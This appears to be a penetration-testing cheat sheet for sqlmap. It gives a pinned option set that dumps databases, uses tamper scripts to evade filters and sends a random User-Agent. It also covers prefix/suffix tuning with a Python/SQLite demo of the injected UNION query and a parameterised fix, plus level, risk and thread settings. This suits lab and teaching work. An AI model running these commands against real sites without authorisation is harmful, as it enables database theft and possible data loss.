SQLMAP

SQLMap is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws.

PINNED

--dump --batch --level=5 --risk=3 --no-cast --threads=10 --random-agent --tamper=between,space2comment
 * go-to option set; append it to -u "<url>" or -r <request file>
 * --batch answers every prompt with the default, --random-agent sends a random browser User-Agent, and the between and space2comment tamper scripts rewrite payloads (> becomes NOT BETWEEN 0 AND, spaces become /**/) to get past simple filters

BASICS

INSTALLATION

root@oco:~$ sudo apt install sqlmap
root@oco:~$ sqlmap -h
 * display basic help
root@oco:~$ sqlmap -hh
 * display advanced detailed help

FLUSHING SESSIONS

By default, when you run sqlmap against a target, it creates a session for that target and stores it on disk in its output directory (on current versions ~/.local/share/sqlmap/output/<target>/, on older ones ~/.sqlmap/output/<target>/).

So, if you give sqlmap the same target again, it continues exploiting the SQLi straight away: the detected injection point, the working payload and any database structure already enumerated are read back from the session file, so it does not need to start from the beginning.

sqlmap --flush-session -u 94.237.49.31:39481
 * use this when you want sqlmap to start from scratch; it deletes the stored session data for that target before testing again

TUNING

SPECIAL PREFIX & SUFFIX REQUIREMENTS

sqlmap -u "{targetSite:port}/?{parameter}={value}" --prefix="%'))" --suffix="-- -"
 * every injection vector is then enclosed between the static prefix %')) and the static suffix -- -, overriding sqlmap's own boundary detection
 * use this when the parameter lands in an unusual SQL context (nested parentheses, a LIKE pattern) and none of the automatic boundaries produce valid SQL

#example vulnerable code target (the injected parameter is q, so the URL would be .../?q=test)
 $query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
 $result = mysqli_query($link, $query);

#result
 The vector UNION ALL SELECT 1,2,VERSION(), bounded with the prefix %')) and the suffix -- -, produces the following (valid) SQL statement at the target:
 SELECT id,name,surname FROM users WHERE id LIKE (('test%')) UNION ALL SELECT 1,2,VERSION()-- -')) LIMIT 0,1
 * the prefix closes the string literal and both parentheses, and the suffix comments out the trailing ')) LIMIT 0,1 left over from the original query
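To see why the prefix and suffix matter, the script below rebuilds the vulnerable query from the PHP example above and runs it against an in-memory SQLite database. It is an added example, not code from the page or from sqlmap: the users table is constructed sample data, sqlite_version() stands in for MySQL's VERSION(), and the inject() helper emulates how sqlmap places the original value, prefix, vector and suffix. It runs the vector three ways (no boundaries, sqlmap's usual single-quote boundary, and the page's %')) / -- - pair) and finishes with a parameterised version of the same query to show that the payload is harmless once the value is bound instead of concatenated.

```python
import sqlite3

# The vulnerable query template from the page; {q} stands for the
# unsanitised $_GET["q"] value the PHP code concatenates into the statement.
TEMPLATE = "SELECT id,name,surname FROM users WHERE id LIKE (('{q}')) LIMIT 0,1"

# Constructed sample schema so the statement can run offline on SQLite.
SCHEMA = """
CREATE TABLE users(id INTEGER, name TEXT, surname TEXT);
INSERT INTO users VALUES (1, 'alice', 'adams'), (2, 'bob', 'brown');
"""

# sqlite_version() plays the role of MySQL's VERSION() in the page's vector.
VECTOR = "UNION ALL SELECT 1,2,sqlite_version()"


def build_query(q):
    """Assemble the statement exactly as the vulnerable PHP code would."""
    return TEMPLATE.format(q=q)


def execute(sql):
    """Run one statement against a fresh in-memory database.
    Returns the result rows, or the error text if the SQL does not parse."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"
    finally:
        conn.close()


def inject(vector, prefix="", suffix="", original="test"):
    """Emulate sqlmap's bounding: original value + prefix + ' ' + vector + suffix."""
    q = f"{original}{prefix} {vector}{suffix}"
    return execute(build_query(q))


def safe_lookup(q):
    """Hardened form: bind the value as a parameter so it can never leave the literal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    try:
        return conn.execute(
            "SELECT id,name,surname FROM users WHERE id LIKE ((?)) LIMIT 0,1", (q,)
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    # 1. No boundaries: the vector is swallowed inside the string literal -> no rows.
    print(inject(VECTOR))
    # 2. A plain single-quote boundary leaves the (( unbalanced -> syntax error.
    print(inject(VECTOR, prefix="'", suffix="-- -"))
    # 3. The page's boundaries close both parentheses and comment out the rest,
    #    so the UNION row (1, 2, <sqlite version>) comes back.
    print(inject(VECTOR, prefix="%'))", suffix="-- -"))
    # 4. Parameterised query: the same payload is just a LIKE pattern -> no rows.
    print(safe_lookup(f"test%')) {VECTOR}-- -"))
```

The third call is the one that corresponds to the --prefix/--suffix command above; the second shows what sqlmap's default boundaries would produce on this query, which is why detection fails without the override.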

EXTENDING VECTORS & BOUNDARIES

  • The option --level (1-5, default 1) extends both the vectors and the boundaries being used, based on their expectancy of success (the lower the expectancy, the higher the level needed to include them). Level 2 also tests HTTP Cookie header values, level 3 also tests the HTTP User-Agent and Referer headers.

  • The option --risk (1-3, default 1) extends the used vector set based on the risk of causing problems at the target side (risk of database entry loss or denial-of-service). Risk 2 adds heavy-query time-based tests; risk 3 adds OR-based boolean tests, which can update or delete every row of a table if the injection point sits inside an UPDATE or DELETE statement.

sqlmap -u www.example.com/?id=1 -v 3 --level=5
sqlmap -u www.example.com/?id=1 --level=5 --risk=3
 * with the defaults (--level=1 --risk=1) up to 72 payloads are used to test a single parameter; in the most detailed case (--level=5 --risk=3) that rises to 7,865 payloads, so expect a much slower and noisier scan
 * -v 3 raises the verbosity so that the injected payloads are printed

CUSTOM COLUMN NUMBERS

this is used if we have already found the exact number of columns of the vulnerable SQL query manually (e.g. with ORDER BY or UNION SELECT NULL,NULL,... probing)

sqlmap -r reqCase7.txt --dump --batch --level=5 --risk=3 --no-cast --threads=10 --random-agent --union-cols=5
 * --union-cols=5 makes sqlmap test the UNION technique with exactly 5 columns instead of probing the column count itself; a range such as --union-cols=5-10 is also accepted

SPEED

sqlmap -r reqCase5.txt --dump --batch --level=5 --risk=3 --no-cast --threads=10
 * --threads=10 sends up to 10 concurrent HTTP requests, which speeds up boolean-blind retrieval and dumping; sqlmap caps this at 10 and refuses higher values, and it falls back to a single thread for time-based blind injection, where concurrency would corrupt the timing measurements
 * --no-cast turns off sqlmap's default casting of retrieved values (wrapping entries in CAST(... AS CHAR)-style expressions and replacing NULL with blanks), which helps when the casting itself triggers errors or changes how the DBMS processes the injection
